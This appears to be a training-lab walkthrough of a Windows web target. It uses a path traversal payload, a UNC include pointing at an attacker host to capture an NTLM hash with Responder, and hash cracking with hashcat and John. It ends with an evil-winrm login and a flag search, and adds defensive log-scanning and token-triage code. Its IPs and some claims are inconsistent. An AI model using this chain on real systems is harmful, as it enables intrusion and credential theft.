
Exploitation experience - lesson 1

Scanning

lika@learning:~/Downloads$ cnmap -sC -sV -T4 10.129.14.123
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 13:24 +07
Nmap scan report for 10.129.14.123
Host is up (0.32s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.51 seconds
lika@learning:~/Downloads$ whatweb 10.129.14.123
http://10.129.14.123 [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTTPServer[Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1], IP[10.129.14.123], Meta-Refresh-Redirect[http://unika.htb/], OpenSSL[1.1.1m], PHP[8.1.1], X-Powered-By[PHP/8.1.1]

Look closely at what the victim is running:

  1. Windows -> which folders the paths will be under (C:/Users, for example)
  2. Linux -> /etc/passwd ?

On port 80, open the web app and check it. If there is a login, try SQL injection or brute force, or Burp Suite. If there is no information yet, after nmap run dirb, gobuster or ffuf to enumerate directories, then dig through those directories for more information. If the web page uses PHP and has a parameter (`?param=`), try path traversal or LFI. Link: https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt

At this point it turns out the victim is vulnerable to path traversal -> try:

../../../../../../../../windows/system32/drivers/etc/hosts

Success, which shows that command injection is possible on the server. Back on the attack machine, use Responder to capture the network traffic (NTLM poisoning) when the victim machine calls a bad network path. Suppose the attack machine's IP is 10.12.126.1; on the victim, request:

$IP$index.php?page=\\10.10.12.126\\test
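From the defender's side, the two requests above (the traversal to `hosts` and the UNC path to the attacker's host) leave a clear trace in the web server's access log. The following is an added example, not code from the original post: a small Python scanner that walks Apache combined-log lines, decodes each query parameter (twice, to catch double URL encoding) and flags traversal sequences, UNC paths and absolute drive paths. The log lines are constructed sample input; the IPs and the `page` parameter follow the walkthrough's `index.php?page=` pattern.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed Apache combined-log lines (sample input, not from the page).
# Lines 3 and 4 reproduce the two request shapes used in the walkthrough:
# a traversal to the hosts file and a UNC path pointing at an attacker host.
SAMPLE_LOG = r"""
10.10.14.5 - - [07/Nov/2025:13:30:01 +0700] "GET /index.php?page=about.php HTTP/1.1" 200 2871 "-" "Mozilla/5.0"
10.10.14.5 - - [07/Nov/2025:13:30:09 +0700] "GET /css/style.css HTTP/1.1" 200 4011 "-" "Mozilla/5.0"
10.10.14.5 - - [07/Nov/2025:13:31:12 +0700] "GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 824 "-" "curl/8.5.0"
10.10.14.5 - - [07/Nov/2025:13:32:40 +0700] "GET /index.php?page=\\10.10.12.126\\test HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.10.14.5 - - [07/Nov/2025:13:33:02 +0700] "GET /index.php?page=..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 512 "-" "curl/8.5.0"
""".strip()

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r"\.\.[\\/]")              # ../ or ..\
UNC_PATH = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")   # \\host\share or //host/share
DRIVE_PATH = re.compile(r"^[A-Za-z]:[\\/]")        # C:\ or C:/


def decode(value: str) -> str:
    """Decode twice so single- and double-encoded payloads normalise the same way."""
    return unquote(unquote(value))


def classify(value: str) -> list:
    """Return the reasons a query-parameter value looks like file-inclusion abuse."""
    decoded = decode(value)
    reasons = []
    if TRAVERSAL.search(decoded):
        reasons.append("path traversal")
    if UNC_PATH.match(decoded):
        reasons.append("UNC path")
    if DRIVE_PATH.match(decoded):
        reasons.append("absolute drive path")
    return reasons


def scan_log(log_text: str) -> list:
    """Walk an access log and report every query parameter whose value is suspicious."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        target = m.group("target")
        # Split on the first '?' by hand; urlsplit is not needed for a bare request target.
        query = target.split("?", 1)[1] if "?" in target else ""
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for raw in values:
                reasons = classify(raw)
                if reasons:
                    findings.append({"line": lineno, "param": param,
                                     "value": decode(raw), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['param']}={f['value']!r} -> {', '.join(f['reasons'])}")
```

The UNC match is the one worth alerting on with the highest priority: a PHP include that resolves `\\host\share` makes the web server authenticate outbound over SMB, which is exactly the condition the Responder step below relies on. Blocking outbound SMB (445) from web servers removes that path regardless of the application bug.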

Responder receives the hash:

Administrator::RESPONDER:e6f24786588c8c...

Crack with hashcat:

hashcat -m 5600 test.hash /usr/share/wordlists/rockyou.txt

Crack with John the Ripper:

lika@learning:~/Downloads$ cat ~/.john/john.pot
$pkzip$6*1*1*0*8*24*8759*a7409df1d7a76ad3809794d387209855bb7638aa589d5be62b9bf373d78055e1dd351925*1*0*8*24*1535*459926ee53809fa53fe26c3e4548cd7819791a638c8d96d3ec7cf18477ffa1e9e2e77944*1*0*8*24*834f*7d2cbe98180e5e9b8c31c5aec89c507011d26766981d17d249e5886e51ac03270b009d62*1*0*8*24*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip$:manuel

lika@learning:~/Downloads$ john -w=/usr/share/wordlists/rockyou.txt test.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
No password hashes left to crack (see FAQ)
ADMINISTRATOR::RESPONDER:e6f2478650000000000000:badminton

1. John writes cracked passwords to its pot file (by default):

~/.john/john.pot

or to a john.pot file in the directory john was run from (depends on the install / version).

2. View cracked passwords (per hash file)

Display results (cracked + uncracked) from the hash file:

john --show path/to/hashfile

Only accounts that have been cracked are shown; each result is printed in the form `user:other fields`.

View the pot file contents directly:

cat ~/.john/john.pot

Connecting to Windows

Connect to the host over WinRM, using the hash:

evil-winrm -i 192.168.164.95 -u Administrator -H a51493b0b06e5e35f855245e71af1d14

or the password:

evil-winrm -i 10.129.14.123 -u Administrator -p badminton

Connect and grab the proof:

```text Title=info
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> users
The term 'users' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ users
+ ~~~~~
+ CategoryInfo : ObjectNotFound: (users:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami /groups


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
*Evil-WinRM* PS C:\Users\Administrator\Documents> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
RESPONDER\Administrator
```

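The `whoami /groups` table is what an incident responder would read to decide how much a session like this one could do. As an added example (not code from the original post), the Python below parses that table and summarises the token: integrity level, whether `BUILTIN\Administrators` is effective or UAC-filtered (a filtered token lists it as "Group used for deny only"), and the logon indicators (`NT AUTHORITY\NETWORK` for a remote session, `NT AUTHORITY\NTLM Authentication` for the auth method). The sample input is the session output above; the SID-to-name table uses documented well-known Windows SIDs.

```python
import re

# Sample input: the `whoami /groups` output from the session above, pasted verbatim.
WHOAMI_GROUPS = r"""
GROUP INFORMATION
-----------------

Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
"""

# One table row: <name> <type> <SID> [attributes]. The name is matched lazily, so the
# first "<type> S-1-..." split wins even when the name itself contains the word "group".
ROW = re.compile(
    r"^(?P<name>.+?)\s+(?P<type>Well-known group|Alias|Label|Group)\s+"
    r"(?P<sid>S-1-[\d-]+)\s*(?P<attrs>.*)$"
)

# Well-known SIDs that matter for privilege triage.
PRIVILEGED_SIDS = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-114": "Local account and member of Administrators group",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
    "S-1-5-32-580": "BUILTIN\\Remote Management Users",
}
INTEGRITY_LEVELS = {"S-1-16-4096": "Low", "S-1-16-8192": "Medium",
                    "S-1-16-12288": "High", "S-1-16-16384": "System"}


def parse_groups(text: str) -> list:
    """Parse the rows of `whoami /groups`; header and separator lines do not match."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append({k: v.strip() for k, v in m.groupdict().items()})
    return rows


def triage(text: str) -> dict:
    """Summarise what the token grants, from the parsed group table."""
    rows = parse_groups(text)
    by_sid = {r["sid"]: r for r in rows}
    integrity = next((lvl for sid, lvl in INTEGRITY_LEVELS.items() if sid in by_sid), "unknown")
    admin = by_sid.get("S-1-5-32-544")
    # A UAC-filtered token still lists Administrators, but marked "Group used for deny only".
    admin_effective = bool(admin) and "Enabled group" in admin["attrs"] \
        and "deny only" not in admin["attrs"]
    return {
        "groups": len(rows),
        "integrity": integrity,
        "admin_effective": admin_effective,
        "privileged_memberships": [n for s, n in PRIVILEGED_SIDS.items() if s in by_sid],
        "network_logon": "S-1-5-2" in by_sid,          # NT AUTHORITY\NETWORK
        "ntlm_authenticated": "S-1-5-64-10" in by_sid,  # NT AUTHORITY\NTLM Authentication
    }


if __name__ == "__main__":
    for key, value in triage(WHOAMI_GROUPS).items():
        print(f"{key}: {value}")
```

Read against the session above, the summary says: high-integrity token, Administrators effective (no UAC filtering, as expected for a network logon), authenticated with NTLM from the network. That combination is the detection signature of the whole chain on the host side: a local Administrator logging on remotely over NTLM, not an interactive console user.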
Then search for flag.txt with:

```powershell
# Variant 1: search the C: drive only
Get-ChildItem -Path C:\ -Filter flag.txt -Recurse -Force -File -ErrorAction SilentlyContinue |
    Select-Object FullName

# Variant 2: search every filesystem drive and show which drive the hit is on
Get-PSDrive -PSProvider FileSystem |
    ForEach-Object {
        Get-ChildItem -Path ($_.Root) -Filter flag.txt -Recurse -Force -File -ErrorAction SilentlyContinue
    } | Select-Object @{n='Drive';e={$_.PSDrive.Name}}, FullName

# Variant 3: same, but match several spellings of the file name
Get-PSDrive -PSProvider FileSystem | ForEach-Object {
    Get-ChildItem -Path ($_.Root) -Recurse -Force -File -Include flag.txt, FLAG.TXT, Flag.txt -ErrorAction SilentlyContinue
} | Select-Object FullName
```